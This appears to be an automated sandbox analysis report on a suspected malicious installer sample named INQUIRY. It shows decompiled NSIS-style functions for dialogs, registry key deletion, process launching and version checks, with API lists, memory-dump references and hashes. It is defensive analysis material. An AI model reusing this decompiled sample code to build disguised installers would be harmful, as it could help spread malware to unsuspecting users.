RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc48D6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsc48D6.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc48D6.tmp
API String ID: 1356686001-488356209
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bd1
0x00402bd3
0x00402bda
0x00402bdd
0x00402bdd
0x00402be3
0x00000000
0x00402be3
0x00402beb
0x00402bf1
0x00000000
0x00402bf4
0x00402bfb
0x00402c01
0x00402c07
0x00402c09
0x00402c0f
0x00402c4d
0x00402c53
0x00000000
0x00402c53
0x00402c11
0x00402c18
0x00402c29
0x00000000
0x00402c37
0x00402c18
0x00402c5a

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,000032D2), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a38
0x00402a49
0x00402a51
0x00402a79
0x00402a60
0x00402a63
0x00402ab3
0x00402ab9
0x00402abb
0x00000000
0x00402abb
0x00402a70
0x00402a75
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac3
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad7
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

0x00404618
0x0040461c
0x00404624
0x00404627
0x00404628
0x0040462a
0x0040462c
0x0040462f
0x0040462f
0x00404636
0x0040463c
0x0040463c
0x00404643
0x0040464e
0x0040464f
0x00404652
0x00404652
0x0040465f
0x0040466a
0x0040466d
0x0040467f
0x00404686
0x00404687
0x00404696
0x004046a6
0x004046c2

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402825
0x00402825
0x00402880
0x0040288c

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 00403897 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x51d818
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "heifsmlbdxlebvytfzg Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x1
						_t27 =  *0x423ec8; // 0x51d9c4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x51d9dc
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040389b
0x004038a0
0x004038a6
0x004038ab
0x004038ab
0x004038b3
0x00000000
0x00000000
0x004038b5
0x004038bb
0x004038c3
0x004038c5
0x004038cb
0x004038cb
0x004038cd
0x004038d9
0x00000000
0x00000000
0x004038dd
0x00000000
0x00000000
0x00000000
0x004038df
0x004038e4
0x004038ed
0x004038f3
0x004038f8
0x0040390c
0x00403917
0x0040392f
0x00403935
0x0040393a
0x00403942
0x00403963
0x00403963
0x00403963
0x00403944
0x00403946
0x00403946
0x0040394a
0x0040394d
0x00403951
0x00403951
0x00403956
0x0040395c
0x0040395c
0x00000000
0x00403946
0x004038fa
0x004038ff
0x00403908
0x00403901
0x00403901
0x00403901
0x004038ff

APIs

SetWindowTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup), ref: 0040392F

Strings

1033, xrefs: 0040389B, 004038A5, 00403916
heifsmlbdxlebvytfzg Setup, xrefs: 0040391E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403898

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\$heifsmlbdxlebvytfzg Setup
API String ID: 530164218-3025496058
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
Error launching installer, xrefs: 004052F8

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1785902839
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x00402880
0x0040288c

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
